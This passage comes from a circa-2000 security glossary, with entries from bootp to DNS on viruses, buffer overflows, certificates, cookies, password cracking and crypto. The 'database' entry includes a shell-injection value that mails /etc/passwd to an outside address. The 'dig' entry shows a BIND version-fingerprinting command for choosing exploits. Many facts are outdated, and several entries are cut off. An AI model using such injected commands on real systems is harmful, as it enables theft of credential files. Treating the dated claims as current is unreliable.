Key point: DHCP is simply an extension on top of bootp. This is important because without an IP address, clients cannot reach bootp servers that reside across routers. Virtually all routers have an extension for bootp forwarding that fixes this issue. Since DHCP had the same requires, the designers just stuck it inside bootp packets rather than requiring yet another change to the routing infrastructure.
Key point: Until macro viruses came along, boot sector viruses where the most common variant. They spread through companies via floppy disks. Users would leave floppy disks in the drive and when the computer restarted, it would attempt to boot from the floppy. This would run the virus, which then infected the boot sector on the hard drive. Any further floppies plugged into the system would then be infected by the virus.
Countermeasures: I worked at a company with anal anti-virus procedures (anti-virus on all desktops, regular wiping of floppy disks). It was never able to completely free itself from the boot sector virus problem; one of the viruses was never successfully eradicated from the company. My own personal policy is to disconnect the floppies on 90% of the machines, and disable floppy bootup on the remaining machines.
Example: A cancel-bot is a program that attempts to cancel lots of messages within USENET newsgroups. These are sometimes used by the USENET Death Penalty or rogue cancellers. *
Example: Search engine spiders that index the web follow web-page links, going from site to site, downloading web-pages.
Example: In the IRC wars, hackers run automated bots to control channels. These are programs (usually in C) that help in administering channels, protection against hackers, flooding, and so forth.
Misconception: Most of the information you read on boxes is terribly outdated and rarely works in the real world. There is the standard memetic drift going on: documents without dates and without descriptions how they don't work in the modern world are invariably picked up and copied by people who believe in the magic but don't understand that the information is useless. Conversely, documents that dispell the magic and explain how hard it really is and how it mostly is no longer valid do not get copied widely.
Key point: Virtually all popular boxes no longer work in newly developed urban areas. However, phone company equipment doesn't change all that fast. While the average phone system is not vulnerable to such attacks, you can eventually find out-of-the-way places that are vulnerable if you look far enough.
Key point: Simply posessing such boxes is illegal under Title 18 USC section 1029.
Example:
Example: A popular DOS (Disk Operating System) program was used in the mid-90s called "BlueBEEP that implemented many box functionality baed upon Tones.
Subdefinition: Ethernet has broadcast domains, allowing you to partially sniff some data from your neighbors, and possibly subvert it. Typical protocols that can be sniffed and subverted in this manner are: ARP, NetBIOS, MSBROWSE, rwho, bootp/DHCP, SNMP. An Ethernet broadcast address is "FF:FF:FF:FF:FF:FF".
Subdefinition: The Internet protocols TCP/IP support a feature known as a directed broadcast, which allows a remote person the ability to send a single packet to an entire subnet. This will then take advantage of the Ethernet broadcast domain once it reaches its destination. Attacks like smurf take advantage of this. A directed broadcast address looks something like 192.0.2.255, where the last integer "255" means "all devices on subnet 192.0.2.x".
Subdefinition: The special IP address of "255.255.255.255" is the local broadcast, and causes the packets to be sent to everyone locally, but not across the Internet.
Key point: Netsape and Microsoft have not yet produced a browser that is hardened against predation from hostile websites.
Key point: Disabling Java, JavaScript, and ActiveX will lock out virtually all hacks against the browser. However, this will also lock out many websites.
Analogy: If you somehow steal somebody's ATM card, you could try to use it in a bank machine. PIN numbers are only 4 digits, meaning 10,000 possible combinations. If you were patient, you could stand at the cash machine trying all possible 10,000 combinations. (Of course, ATM machines will always eat the cards after a few unsuccessful tries in order to stop this).
Key point: The term brute force often means "the most difficult way". In the above example of the PIN number, you can always find the PIN number after guessing 10,000 combinations. But sometimes there are easier ways. For example, a bank may choose to assign PIN numbers based upon a combination of the issuing date and the user's name. Therefore, the problem is reduced to guessing when a card was issued, which may consist of only a few hundred guesses. Therefore, any technique that is more difficult than brute force is pointless. Likewise, brute force is very difficult, so hackers continually search for techniques that are less difficult.
Key point: The possibility of doing brute-force key-space searches is often compared to the age of the universe, number of atoms in the planet earth, and the yearly output of the sun. For example, Bruce Schneier has calculated that according to what we know of quantum mechanics today, that the entire energy output of the sun is insufficient to break a 197-bit key.
Contrast:
Misconception: Certification doesn't been the business cannot get hacked. Rather, it certifies that the business is aware of its security risks, has identified how it is going to manage those risks, and has communicated this information broadly within the organization. For example, a business could put out a website with the statement "we don't care if it gets hacked" and be within compliance. They just need to identify this fact and publish it within the organization.
See also: Common Criteria, CDSA
Analogy: Consider two popular bathroom sink designs. One design is a simple sink with a single drain. The other design includes a backup drain near the top of the sink. The first design is easy and often looks better, but suffers from the problem that if the drain is plugged and the water is left running, the sink will overflow all over the bathroom. The second design prevents the sink from overflowing, as the water level can never get past the top drain.
Example: Programmers often forget to validate input. They (rightly) believe that a legal username is less than 32 characters long, and (wrongly) reserve more than enough memory for it, typically 200 characters. The assume that nobody will enter in a name longer than 200 characters, and don't verify this. Malicious hackers exploit this condition by purposely entering in user names a 1000 characters long.
Key point: This is a classic programming bug that afflicts almost all systems. The average system on the Internet is vulnerable to a well known buffer overflow attack. Many Windows NT servers have IIS services vulnerable to a buffer overflow in ".htr" handler, many Solaris servers have vulnerable RPC services like cmsd, ToolTalk, and statd; many Linux boxes have vulnerable IMAP4, POP3, or FTP services.
Key point: Programs written in C are most vulnerable, C++ is somewhat less vulnerable. Programs written in scripting level languages like VisualBasic and Java are generally not vulnerable. The reason is that C requires the programmer to check buffer lengths, but scripting languages generally make these checks whether the programmer wants them or not.
Key point: Buffer overflows are usually a Denial-of-Service in that they will crash/hang a service/system. The most interesting ones, however, can cause the system to execute code provided by the hacker as part of the exploit.
Defenses: There are a number of ways to avoid buffer-overflows in code:
Key point: The NOOP (no operation) machine language instruction for x86 CPUs is 0x90. Buffer overflows often have long strings of these characters when attacking x86 computers (Windows, Linux).
Key point: In a successful buffer overflow exploit, hackers force the system to run their own code. Since most network services run as "root" or "administrator", the exploit would give complete control over the machine. For this reason, more and more services are being configured to run with lower privileges.
See also: stack frame
Controversy: A debate over "full-disclosure" surrounds BUGTRAQ. On one side is a community of people that believe full and open disclosure of vulnerabilities and exploits is necessary to promote the developement of protections against hacking. On the other side is a community of people that believe total disclosure, including script-kiddy ready exploits, is harmful.
[ C | CA | cable-modem | cache | CALEA | call forwarding | call-back verification | Caller ID | camping | cancel-bot | Capstone Project | Carnivore | carrier-scanning | CAST | CBC | CDE | CDSA | central office | certificate | Certificate Authority | CFB | CGI | cgi-bin | chaining | challenge | change-control | chat | checksum | chosen plaintext | chroot | CIA | cipher | Cipher Block Chaining | ciphertext | Ciphertext Feedback | circuit switched network | clean desk | clear-text | clearance | CLI | Clipper | clonebot | cmos | CMSD | CO | COCOT | code | code names | codebook | colo | COMINT | command-line | Common Criteria | community strings | compiler | complexity | compression | compromise | Computer Fraud and Abuse Act of 1986 | con | confidentiality | cookie | copyright | countermeasures | covert channel | crack | cracker | crackz | CRC | credentials | credit card | cron | cryptanalysis | crypto | crypto-anarchy | cryptographic | cryptographic checksum | cryptography | CSN | culture | cybercrime | cyberpunk | cyberstalking | cypherpunks ]
Point: The language is quirky, difficult for beginners to learn, and really just an accident of history. Despite this, one must grok the language in order to become an elite hacker.
Key point: The large number of buffer overflow exploits is directly related to poor way that C protects programmers from doing the wrong thing. On the other hand, these lack of protections leads directly to its high speed.
Key point: If you built your own hardware, you could likely build a sniffer to spy on your neighbor's Internet traffic. Some cable-modem segments can even be sniffed without special hardware by anybody who reconfigures their machine. Some cable-modem segments allow you to redirect a neighbor's traffic through your machine, which you can then sniff.
Key point: Your neighbors are open to lots of hacking techniques that are not generally possible from across the Internet. First, your machine will receive broadcasts from your neighbors. These broadcasts basically advertise your neighbor's presence telling you how to hack into them. For example, neighbors who share their hard-drives will advertise themselves in the Window's Network Neighborhood. UNIX machines will also advertise a lot of information, such as through the 'rwho' mechanism. There are also lots of non-Internet protocols that appear on the local wire that can be used to break into your neighbors.
See also: DSL
Key point: Sometimes systems can be exploited through the cache. Examples are:
See also: key recovery, Carnivore, ECPA
Point: In order for Caller ID to work, both you and the caller must be hooked up to SS7 phone systems. SS7 is the system that will transmit the phone number to your CO. Secondly, you must have a digital phone (cell phone, ISDN) or an analog phone that complies with whatever standard your CO will use to transmit the signal (e.g. some standards will transmit the Caller ID number in the spaces between the first two rings of the phone, which means it can get interupted if you pick up the phone too quickly). Finally, you must have adequate wiring that doesn't distort the Caller ID signal from the CO.
Contrast: A similar functionality is ANI, which is used primarily just for billing data. ANI predates Caller ID (by about 50 years). There are cases where the number reported by ANI will be different from the Caller ID since the services are essentially independent.
Point: Caller ID can be used for call-back dialups. What happens is that you dial-up a computer. The computer records your phone number automatically, then dials back to your machine. This greatly enhances security because it prevents users from being completely anonymous.
Example: An intruder monitors a range of ISP dialup lines with pings. As soon as a user dials-up, the hacker is notified and automated attack scripts are run. For example, it may ping the range continuously, and as soon as a ping responds, a script is run that attempts to connect to File and Print Sharing and read files from the hard-disk. When dialing up to an ISP, the first 10 minutes are the most dangerous. A hacker can be in and out of the system before the user even realizes they are connected to the network.
Example: A hacker scans a victim for all the equipment and services exposed to the Internet (such as recording all the banners). The hacker then "camps" waiting for a 0-day exploit to be posted to various places. At that point, the hacker launches the attack against the victim, getting a foothold in to the network before the victim can patch the hole.
Key point: Their Escrowed Encryption Standard (EES) specified a way to include a Law Enforcement Access Field (LEAF) that would provide for court-authorized decryption.
Misconception: The FBI does not install this on networks. They have to provide a search warrant to an ISP for the e-mail. Carnivore is one of the ways the ISP can fulfill the demands of the search warrant.
History: The first wiretap of an e-mail message was near the end of 1995. A German engineer advertised cellular-fraud equipment on Compuserve. The FBI succeeded in getting warrants to read his (and accomplice's) e-mail, and successfully prosecuted them.
See also: CALEA
| ToolTalk rpc.ttdbd |
Provides the core of most "desktop" services. Provides an inter-application communication library that can be linked to applications. | ToolTalk has had two major remote exploits providing root access. In 1999, a buffer-overflow was discovered. In 2001, a format-string exploit was discovered. Both resulted in widespread compromises. |
|---|---|---|
| CMSD (Calender Manager Server
Daemon) rpc.cmsd |
Provides an online calender were different people can view each other's schedules. The very existence of this application scares some security profesionals because it reveals too much information about individuals | In 1998, a buffer-overflow in CMSD was one of the most popular exploits on the Internet. |
| dtspcd DeskTop SubProces Control Daemon |
A service whereby a CDE process can easily launch another process on another computer. | In November 2001, a remote exploit was discovered that affects all major UNIX vendors. |
Key point: Certificates can be revoked. This means that a company who believes that their site has been compromised can put up a server on the Internet that tells everyone else that the certificate is no longer valid.
Key point: The Verisign embedded certificates in older browsers (IE 3.0, Netscape 4.0) have expiration dates of January 1, 2000. This means that anybody using older browsers will get nasty warnings when they visit e-commerce sites or attempt to verify files with authenticode.
Key point: The way it is supposed to work is that you have a certificate that claims to be Microsoft signed by Verisign (a popular CA), then you trust that Verisign has done a reasonable job both ensuring that Microsoft is who they say they are, and that Microsoft has done a reasonably good job protecting their private keys from theft.
Contrast: Microsoft could create a self-signed certificate, but then anybody else could create a self-signed certificate claiming to be Microsoft. Therefore, you trust a CA-signed certificate more than a self-signed certificate, as long as you trust the CA.
Key point: How do you trust a CA? The answer is marketing. First, a company like Verisign has spent millions of dollars creating a reputable company that would be destroyed if a flaw was found in their procedures (i.e. thieves were able to steal their private keys). Second, Verisign (and a few other CAs) have managed to embed their public keys within Internet Explorer and Netscape Navigator. This means that any website using SSL must obtain a certificate signed by one of these built-in CAs, or else users get confusing warning messages.
Humor: Microsoft uses certificates signed by Verisign, because it is trusted by many people. The reason so many people trust Verisign these days is because its root keys are included with Microsoft's browsers.
Key point: One of the chief risk is the theft of the private key used to sign things. If a hacker/thief is able to steal it, then they can masquerade as someone
Key point: Several important CA certificates (i.e. Verisign) expired on Dec. 31, 1999. Since it is feasible to eventually compromise a certificates, they usually expire at some date. The certificates for trusting root CAs that are built-in many browsers (Internet Explorer 4.0 and earlier, Netscape Navigator 4.06 and earlier) were created in 1995, and were made for a 5-year lifespan. One of the creators of these certificates now says he wished he'd put the expiration date a little off, such as on Dec. 15, in order to avoid the Y2K madness.
Misconception: They are called "CGI scripts" because they are usually written in a scripting language such as PERL, shell scripting, and other minor scripting languages (TCL, Python, etc.). However, even when they are compiled binaries from C source code, they are still often referred to as "CGI scripts".
Point: The word "CGI" stands for "Common Gateway Interface", which generally confuses people more than help them. The idea is that you have the Internet and some sort of database. A combination HTTP server and CGI script will act as a gateway between the Internet and database.
Key point: In most cases the user is prompted for the password, which the client then stores in memory. In the use of smart cards, however, the system may give the user the challenge string, which the user then types into the smart card. The smart card then produces a response, which the user must type back into the system. In this way, the user validates that they have the smart card.
Key point: Challenge-response systems are thought to be more secure because the challenge/response is different every time. This guards against replay attacks as well as making cracking more difficult.
Key point: Favorite because it provides real-time anonymous communication.
Key point: Checksums are not secure against intentional changes by hackers. For that, you need a cryptographic hash.
The jail call in BSD is a more advanced version for creating the same sort of sandbox.
Point: In order for it to work properly, some common programs and libraries (e.g. /bin/sh, /usr/lib/libc.so.1, ...) need to be copied/linked to the appropriate locations in the new directory tree.
Key point: A process running with root access can break out of a chrooted environment. Therefore, it should be used in conjunction with setuid.
Key point: Executive Order No. 12333 of 1981 explicitly prohibits the Central Intelligence Agency from engaging, either directly or indirectly, in assassinations. This hasn't been followed to the letter -- for example, they were caught training people in Central America during the cold-war how to conduct assassinations.
Key point: A block cipher is one that encrypts a block of data at a time. For example, DES uses a block size of 64-bits. Each input block must correspond to exactly one output block (like a codebook). A block-cipher suffers from the fact the same data repeated in a message would be encoded in the same way. Consider a block size of 8-bit encrypting English text; you could therefore figure out all the letter 'e's in the cipher text because they are the most common letter used. Therefore, block-ciphers are often used in a chaining mode such that the same pattern will indeed be decrypted differently.
Key point: A stream cipher is essentially a chained block cipher with a block size of 1 (either 1-bit or 1-byte). It generates a keystream against which it XORs the plaintext, operating much like a one-time pad, though less secure in theory but more secure in practice.
Example: Some popular ciphers are:
Contrast: clear-text, plaintext.
Misunderstanding: The word text comes from traditional cryptography that meant the text of messages, though these days text can refer to binary computer data as well.
Key point: In block-ciphers, the key represents a codebook. In other words, you could use the key to generate a huge book of matching pairs whereby each plaintext block would match to exactly one ciphertext block. Then, you could encrypt messages by looking them up in this table.
See also: ECB
Example: Continuous power is one of the major features that a collocation facility may provide. The theory is that a website doesn't need a UPS because the the collocation facility will be more reliable than the UPS itself. For example, I host a site at a colo that has connects to two separate city grids for power, with their own battery backup system, as well as their own generator. They occasionally unplug themselves from the city grids in order to test their system. Likewise, they bring multiple power feeds to racks so that a system with multiple power supplies can get its power from independent grids
Key point: Major colos have visually impressive security. However, they really aren't at the same paranoid level as the military, CIA, NSA, or banks (and probably won't be until a major physical security breach occurs). Their network security is extremely weak, often forcing customers to share common broadcast domains, which would allow one customer to subvert another's traffic.
Key point: The average hacker does all his/her work from the command-line. Virtually all hacker tools are command-line oriented.
CC is a set of government-oriented standards designed to create a commonly agreed upon criteria in which to describe and judge infosec. For example, if you want to purchase a "secure" computer from a vendor, the CC gives you a common set of criteria with which to evaluate that system. If you want to talk about infosec issues, the CC gives you a language in which to describe them. These common criteria were put together by government departments from Canada, France, Germany, the Netherlands, Great Britain, and the United States (both NIST and the NSA).
Controversy: The CC defines terminology uses terminology that is far from the infosec mainstream. Furthermore, many believe that products that match the criteria would be secure, they would also be worthless (in much the same way that a computer turned off, unplugged, and locked in the basement is secure from remote attacks).
Key point: The CC breaks down security functionality into the following areas:
Resources: http://csrc.ncsl.nist.gov/cc/
Key point: A compiler is a form of lossy compression and one-way encryption. All the information meaningful to humans is removed from the code leaving only the information necessary for the computer. This means that humans can no longer easily read the resulting program directly. Because of the "one-way" nature of the operation, programs cannot be used to recover the existing source code. This effect is different in various languages. C++ is the worst language in terms of decompilation; Java is the best. Most Java applets can be decompiled back to some semblance of their previous form. This has led to a market for programs that further obfuscate Java binaries in an effort to hide the original source code. Some compilers do leave human-readable symbols behind for debugging purposes. They won't reveal the original source, but can still be useful for reverse engineering They can be "stripped" from the binary.
The best way to understand complexity is to consider the ancient parable (Babylonian?) about a king and a wise subject who did a favor for him. The subject asked for one piece of grain to be placed on the first square of a chess board, two grains on the second, four grains on the third, and so on, doubling the amount of grain for each successive square.
| 1 | 2 | 4 | 8 | 16 | --- | --- | --- |
| --- | --- | --- | --- | --- | --- | --- | --- |
| --- | --- | --- | --- | --- | --- | --- | --- |
| --- | --- | --- | --- | --- | --- | --- | --- |
| --- | --- | --- | --- | --- | --- | --- | --- |
| --- | --- | --- | --- | --- | --- | --- | --- |
| --- | --- | --- | --- | --- | --- | --- | --- |
| --- | --- | --- | --- | --- | --- | --- | --- |
The question is: how much grain does this come out to? Your possible choices are:
The problem is known as having exponential complexity. The average computer scientist, when confronted with this problem, would intuitively guess the correct answer, which is that the amount of grain is a billion times a billion, or more than all the grain ever harvested by mankind.
| 1 | 2 | 4 | 8 | 16 | 32 | 64 | 128 |
| 256 | 512 | 1024 | 2048 | 4096 | 8192 | 16384 | 32768 |
| 65536 | 131072 | 262144 | 524288 | 1048576 | 2097152 | 4194304 | 8388608 |
| 16777216 | 33554432 | 67108864 | 134217728 | 268435456 | 536870912 | 1073741824 | 2147483648 |
| 4294967296 | 8589934592 | 17179869184 | 34359738368 | 68719476736 | 137438953472 | 274877906944 | 549755813888 |
| 1099511627776 | 2199023255552 | 4398046511104 | 8796093022208 | 17592186044416 | 35184372088832 | 70368744177664 | 140737488355328 |
| 281474976710656 | 562949953421312 | 1125899906842624 | 2251799813685248 | 4503599627370496 | 9007199254740992 | 18014398509481984 | 36028797018963968 |
| 72057594037927936 | 144115188075855872 | 288230376151711744 | 576460752303423488 | 1152921504606846976 | 2305843009213693952 | 4611686018427387904 | 9223372036854775808 |
Example: Let's say that a dictionary was not sorted. This means that you would have to start at the begining and look at every word until you found the definition you were looking for. This is an algorithm with linear complexity. The time it takes you to lookup a word in such a dictionary is related to the number of words in the dictionary: if you double the size of such a dictionary, you will double the amount of time it takes to lookup a word. In other words, the time to lookup a word in this dictionary is on the order of the size of the dictionary. This is expressed as O(n), where n is the size of the dictionary.
Example: Dictionaries are sorted before printing. This means that you can quickly find the word you are looking for. In terms of complexity we are more interested in how much longer it will take you to lookup a word if we double the size of the dictionary. In other words, the Oxford English Dictionary (OED) is about 8 times larger than a more abridged English dictionary. However, it only takes about 3 times longer to lookup a word in the OED. As the problem size grows, the amount of effort it takes to figure out the problem grows less slowly. If the OED were 16-times larger, then it would take only 4-times longer to search. If the OED were 32-times larger, it would take only 5-times longer to search. This mathematical relationship is known as a logarithm. The increase in computing power needed to solve such a problem grows on the order of the logarithm of size of the problem. This is expressed as O(logn). Logarithm problems are much easier to solve than linear ones, which is why we sort dictionaries.
Example: The chessboard problem mentioned above is similar to encryption keys. Every additional square on the chessboard doubles the size of the problem; every additional bit added to a key doubles the amount of time it would take to crack it. This means that a 32-bit key would take roughly a billion trials in order to crack, a 64-bit key would be roughly a billion times harder than that to crack, and a 128-bit key is a billion billion times harder to crack than a 64-bit key. This complexity is expressed as O(2n).
Key point: The following table shows the complexity of some algorithms.
| big-O | complexity | problem = 8 elements | problem = 32 elements |
| O(logn) | logarithmic | 3 seconds | 5 seconds |
| O(n) | linear | 8 seconds | 32 seconds |
| O(n2) | quadratic | 1 minute | 15 minutes |
| O(n3) | cubic | 9 minutes | 9 hours |
| O(2n) | exponential | 4 minutes | 136 years |
Contrast: For the most part, the words confidentiality and privacy are interchangeable. We typically apply the word privacy to individuals, and include ideas like anonymity and unobservability. We use works like confidentiality to refer government, military, and business who wish to defend against eavesdropping.
Key point: We use encryption to protect secrets from being eavesdropped.
See also: Confidentiality is often mentioned along with other key security concepts such as integrity, authentication, and non-repudiation.
Misconception: Cookies are not a security/privacy risk. However, when combined with HTTP Referer field and cross-site imbedded images, they can be used to track user's activities. Users have sued sites like DoubleClick that have massive cross-site imbedded images over the privacy information they collect. Cookies receive most of the blame for this.
Example: The biggest privacy hole is when cookies are combined with the HTTP Referer field. If many sites imbed images (like advertisements) from a single site, that single site can use cookies in order to track a user going among those sites. The cookie does not identify who the user is, but can track what the user does. Other information, like web-site logons, can then be combined with this information in order to track how the person is.
Example: JavaScript has a long history of problems with cookies such that one website can retrieve the cookie information for another website. Since cookie information often contains username/password information, this can compromise the site.
Key point: Turning off cookies is not practical. The best you can hope for is "cookie management" -- choose which sites you want to allow cookies for but deny them to all the rest.
Key point: One rootkit uses ICMP as a covert channel. It creates a virtual TCP-like circuit inside of ping packets.
Key point: Covert channels can become extremely covert. In theory, one can create a covert channel where only the IP identification field (16-bits) carries the data. More subtle issues can also be exploited for covert channels, such as timing between packets, or the number of packets sent within a time interval. The more covert the channel, the lower the bandwidth.
Example:
Culture: In the sci-fi book Mirror Friend, Mirror Foe by
Robert Asprin and George Takei, the protagonist talks with his grandfather via
video conferencing. Verbally, they have an unimportant conversation, but the
real conversation takes place with hand gestures.
In am episode of Star
Trek: The Next Generation, two crewmen trap on an alien vessel create what
appears to be background radiation as far as computers can detect, but which
is actually in the form of music that their fellow crewman can recognize (and
therefore, locate them).
History: When the UNIX operating system was first developed, passwords were stored in the file /etc/passwd. This file was made readable by everyone, but the passwords were encrypted so that a user could not figure out who a person's password was. The passwords were encrypted in such a manner that you could test a password to see if it was valid, but you really couldn't decrypt the entry. (Note: not even administrators are able to figure out user's passwords; they can change them, but not decrypt them). However, a program called "crack" was developed that would simply test all the words in the dictionary against the passwords in /etc/passwd. This would find all user accounts whose passwords where chosen from the dictionary. Typical dictionaries also included people's names since a common practice is to choose a spouse's or child's name.
Contrast: A "crack" program is one that takes existing encrypted passwords and attempts to find some that are "weak" and easily discovered. However, it is not a "password guessing" program that tries to login with many passwords, that is known as a grind
Key point: The sources of encrypted passwords typically include the following:
Key point: The "crack" program is a useful tool for system administrators. By running the program on their own systems, they can quickly find users who have chosen weak passwords. In other words, it is a policy enforcement tool.
Tools: on UNIX, the most commonly used program is called simply "crack". On Windows, a popular program is called "l0phtCrack" from http://www.l0pht.com/.
Controversy: This work is extremely controversial. See the word hacker for a discussion about the way that "cracker" is used in the computer enthusiast community vs. the security community.
Culture: Cracking programs is its own little underground 'scene' independent of other hacking activities. Groups and individuals often compete to be the first to break a new copy protection scheme in popular programs. There are many sites that catalogue cracked programs.
Key point: Like a checksum, a CRC is not able to detect intentional changes. You must use a cryptographic hash for that.
Key point: Credit card numbers may be stolen in the following areas:
Key point: A skimmer is a device that reads the electronic stripe off the physical credit card. While the word can refer to legitimate card readers, the process of skimming usually refers to criminal activities. In a restaurant, a waiter may swipe the card twice: once on the legitimate device, and once on their own private device. The information from the magnetic stripe can then be written back onto their own credit cards. This allow somebody to go into a physical store and present a credit card that is then swiped by the merchant. Some credit card scanner devices are the size of pagers, allowing a waiter to scan the credit card secretly.
Key point: When the machine is compromised, intruders will often put backdoor jobs into the crontab. When the victim tries to clean up his/her machine, the jobs in the crontab will run giving the intruder control again. This sort of thing happened in the famous attack against the New York Times; they kept cleaning up the machine, but cron kept giving control back to the intruder. Typically, these jobs would run during the wee hours of the morning when nobody is looking.
Key point: The different kinds of cryptanalysis are:
Misconception: Movies often show people easily breaking crypto. In real life, crypto is generally unbreakable when done properly. Law enforcement and hackers rarely have to resort to breaking crypto, but instead attack the human actions around it.
History: So far, there are four major eras in cryptography.
Point:
The best example is the "checksum" vs. "hash". A checksum verifies that data hasn't been corrupted unintentionally. For example, all IP packets are checksumed in case they corrupted accidentally between sender and receiver. A cryptographic hash verifies that data hasn't been corrupted intentionally. Hackers can (and do) change IP packets between the sender and receiver in order to carry out an attack. Since IP's checksum is not cryptographically secure against hackers.
There are two features that are required in order to be cryptographic. The first is that the algorithm be secure against attack. A checksum uses simple addition, while hashes use a complex set of mathematical operations. The second is that the key must be of a sufficient size in order to prevent brute force attacks. The IP checksum is only two-bytes long, so that even if the algorithm were secure, it would require only 65536 tries for the hacker to get it right, which can be done in real-time.
Key points: The two defining books of cyberpunk are Neuromancer by William Gibson and Snow Crash by Neal Stephenson. Neuromancer is considered "hard core" cyberpunk that launched the genre.
See also: anarchy
Key point: Cyberstalkers target the weak (females, children, newbies, emotionally unstable).
Tips:
Examples: Well-known cypherpunks include:
[ DACL | daemon | Data Encryption Standard | data havens | data-driven attack | database | datagram | DDoS | decipher | decipher | decompile | decrypt | decryption | deface | defaults | degauss | Demilitarized Zone | demon-dialing | Denial of Service | DER | DES | DH | DHCP | dial-up | Dialed Number Recorder | dialout | dictionary | differential cryptanalysis | Diffie-Hellman | dig | digital signature | dinosaur killer asteroid | directory climbing | directory traversal | DISA | disassemble | discretionary access control | distros | DMZ | DNR | DNS | DNSSEC | Domain Name System | DoS | double entry | downgrade attack | dress-code | dropper | drug-use | DSA | DSL | DSS | DTMF | dtspcd | dual homed system | dumpster diving | dynamic packet filter ]
Key point: The near-programming quality of SQL means that it is open to much the same security holes that plague other scripting languages. For example, a frequent attacks against databases is to insert shell metacharacters into data fields. For example, consider a reporting system using PERL that extracts data out of a database. I may create a bank acount where name is "| mail smc@robertgraham.com < /etc/passwd", which will send me the password field when you run your month-end reports. In late 1999 and early year 2000, thousands of Microsoft's web servers were broken into because programs submitted command-line statements through SQL query statements through a default script left open on default installations of their servers.
Many companies have HTML FORMS that manipulate back-end databases; most of them can be hacked with data-driven attacks. The only defenses are thorough education of the programmers who write the systems, or create a system that thoroughly untaints the data (such as specialized proxies).
Example: Sealand is a "principality" off-shore from the British Isles hosting HavenCo's data haven.
See also: anarchy
Key point: The Internet is defenseless against these attacks. The best defense is for ISPs to do "egress filtering": prevent packets from going outbound that do not originate from IP addresses assigned to the ISP. This cuts down on the problem of spoofed IP addresses.
History: The original DDoS tools were clonebots used during IRC wars.
See also: zombie
Key point: There are sites, like http://www.attrition.org/ that catalogue defaced sites and mirror the defaced web-pages.
Key point: Defaced web-pages is an important part of hacker culture. The more pages a hacker can break into, the more intelligent they may seem (though it typically requires more patience than intelligence). One of the key things is the defacers never reveal to the public how they broke in. They try to protray themselves as elite hackers when in reality most defacements are by script-kiddies.
Key point: Elite hackers rarely deface web-pages, they instead break in and control the server for other nefarious purposes that yield more profit.
Key point: Web servers are easy to deface because the average OS and web server contains vulnerabilities (defaults and samples) upon installation. It takes extensive effort to harden a server.
Key point: Security irritates customers who prefer products that are easy to use. Therefore, most vendors make the same trade off. They ship their systems with the best "out-of-box" experience, and as a result most boxes are easily hacked in their default state. The more a vendor touts its ease-of-use, the more likely hackers will find that vendor's products easy to hack.
See also: samples
Best practice: Degauss all floppy disks and hard-drives before throwing them away. A lot of data from corporations have been recovered from defective disks that were thrown away. An equivalent for CD-ROMs is to put them in the microwave.
See also: wipe
Key point: DES ushered in a new era of cryptography. Before DES, strong encryption was only available to large governments and militaries. Cryptography research was similarly limited. Anything that the average person might use could easily be cracked by a major government. DES created a well-defined, easily verifiable security architecture that was available to anyone. DES-capable products flooded the market. Beyond making encryption products available to anyone, DES essentially created the cryptographic community. Before DES researchers toiled away under government/big-business secrecy, After DES, cryptography become a normal computer-science subject. Whereas DES itself was developed by secretive government agencies (NSA) and mammoth corporations (IBM), DES's replacement will likely be created by relatively independent researchers and the cryptographic community as a whole.
Contrast: As of the year 2000, DES has been supplanted by the newer AES. Because DES has only 56-bit keys, it can easily be cracked within hours.
Contrast: An increasingly popular form of DES is Triple DES which increases the key strength to 112 bits.
History: In September, 1998, a German court ruled DES "out of date and unsafe" for banking applications.
Key point: It takes only a couple minutes to run through hundreds of thousands of words in a dictionary in order to crack a password. Therefore, never choose a word that may be in a dictionary.
Key point: The dictionary files that hackers use are not necessarily the same as English dictionaries. In theory, users will choose the same passwords they have used before, and unrelated users will choose the same passwords. Therefore, lists of passwords users chose in the past forms a key component of hacker dictionaries.
Key point: Hackers also run non-English dictionaries, so choosing foreign words isn't a good defense.
Contrast: Whereas RSA is based upon the mathematical problem of factoring large numbers, DH is based upon the discrete logarithm problem. Whereas RSA can be used to encrypt messages, DH can only be used for key-exchange. However, RSA is essentially only used for key-exchange in the first place. The disadvantages of DH vs. RSA are:
Contrast: The most common use of Diffie-Hellman is ElGamal, a public-key encryption variant of Diffie-Hellman. The U.S. government standard DSS is based upon ElGamal.
See also: RSA, public-key crypto
Key point: Hackers like to run the following command in order to query the version of BIND:
dig -t txt -c chaos VERSION.BIND @ns1.example.comThe BIND server supports a kludge whereby a "chaos" "txt" record contains the version number of the server. You can look this up in your script-kiddy version list in order to figure out what scripts this server is vulnerable to. Here are some results I get back from this command:
| 4.9.6-REL | RedHat 5.0 (Hurricane) |
| 8.2.1 | Mandrake 6.1 (Helios) |
| SERVFAIL | Solaris 2.6 |
| NOTIMP | WinNT DNS |
| 8.2.2-P5 | RedHat 6.2 |
Digital signatures are based upon the mathematics of cryptography. An individual is issued a certificate by a certificate authority (CA). This certificate contains a private-key that is kept secret, and a public-key that everyone will know. The individual uses the private-key to digitally sign the document; everyone else can use the public-key to verify this. A side effect of this is that the signature will also validate the the integrity of the document and that it has not been altered once signed.
Key point: Digital signatures apply to a wide variety of things outside the realm of tradditionally signed documents.
Example: Microsoft's Authenticode allows application developers to sign their programs. Any alteration to the software will result in an invalid signature. Therefore, hackers can't add trojans/viruses to commercial software without it being detected.
Key point: Digital signatures only work if people check them. People rarely check signatures in e-mail or software.
Therefore, anything less likely than being wiped out by an asteroid is consisered "impossible".
Analogy: When calling somebody via the telephone, you can lookup their name in the phone book in order to find the telephone number. DNS is a similar directory service. When contacting a web site, your browser looks up the name in DNS in order to find the IP number.
History: DNS is relatively new. When the Internet was small, every machine simply had a list of all other machines on the Internet (stored in /etc/hosts). Generally, people just had the IP addresses of machines memorized in much the same way that people memorize phone numbers today.
Key point: DNS is not needed for communication. If a DNS server goes down, newbies will think that the entire network is down. Hackers frequently deal with raw IP addresses, and indeed often bypass DNS entirely as it may give off signs of an attack.
Key point: The DNS hierarchy starts from the "top level domains" of .com, .net, .org, .edu, .giv, .mil, and the two-letter country codes (e.g. .us for United States, .jp for Japan).
Misunderstanding: Both IP addresses and domain names use dots: "www.robertgraham.com" vs. "192.0.2.133". This has no significance; the usage of these dots is unrelated. Trying to match things up one-to-one is wrong (i.e. ".com" == "192.").
Analogy: What is your phone number? If I asked you this, you could give me both your home number and your cell phone number. I can reach you at either one. In much the same way, the a domain name like http://www.yahoo.com/ can have multiple IP addresses. Every time you visit that site, you might go to a separate IP address. You can test this out yourself. Go to the command-line and type "ping www.yahoo.com". Notice how it comes back with an IP address that it pings. After that runs, try it again. Notice how the second time it is pinging a different IP address.
Details: DNS provides a number of resource records (RR):
| A ^ |
